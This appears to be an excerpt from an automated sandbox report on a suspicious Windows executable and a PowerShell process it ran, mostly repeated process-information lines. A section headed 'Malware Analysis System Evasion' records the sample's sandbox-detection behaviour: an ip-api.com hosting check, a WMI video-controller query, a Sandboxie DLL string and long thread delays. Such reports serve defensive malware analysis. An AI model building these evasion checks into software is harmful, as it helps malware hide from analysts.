                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                     Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                     Source: 2QaN4hOyJs.exe, 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                                     Source: 2QaN4hOyJs.exe, System.0.dr | Binary or memory string: SBIEDLL.DLLINFO
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Memory allocated: 16A0000 memory reserve | memory write watch
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Memory allocated: 1B190000 memory reserve | memory write watch
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 922337203685477
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 600000
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 599886
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 599766
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 599656
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 599541
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 599406
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 599296
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 599176
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 599003
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 598860
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 598703
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 598594
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 598457
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 598328
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 598219
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 598109
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 597985
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 597860
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 597735
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 597610
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 597485
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 597360
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 597235
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 597110
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 596985
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 596860
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 596735
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 596619
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 596500
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 596374
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 596240
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 596106
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 595984
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 595873
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 595766
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 595641
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 595531
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 595422
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 595313
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 595203
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 595094
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 594969
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 594859
                                     Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Thread delayed: delay time: 594750
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594641Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594531Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594422Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594313Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594188Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 594078Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 593969Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 593844Jump to behavior
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeThread delayed: delay time: 593735Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 entries)
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe | Window / User API: threadDelayed 2997, 6800
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5963, 3876, 8084, 1515, 7849, 1686, 6010, 3727
Source: C:\Users\user\Desktop\2QaN4hOyJs.exe TID: 3632 | Thread sleep time (each >= -30000s): -24903104499507879s, -600000s, -599886s, -599766s, -599656s, -599541s, -599406s, -599296s, -599176s, -599003s, -598860s, -598703s, -598594s, -598457s, -598328s, -598219s, -598109s, -597985s, -597860s, -597735s, -597610s, -597485s, -597360s, -597235s, -597110s, -596985s, -596860s, -596735s, -596619s, -596500s, -596374s, -596240s, -596106s, -595984s, -595873s, -595766s, -595641s, -595531s, -595422s, -595313s, -595203s, -595094s, -594969s, -594859s, -594750s, -594641s, -594531s, -594422s, -594313s, -594188s, -594078s, -593969s, -593844s, -593735s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 | Thread sleep count: 8084 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 | Thread sleep count: 1515 > 30
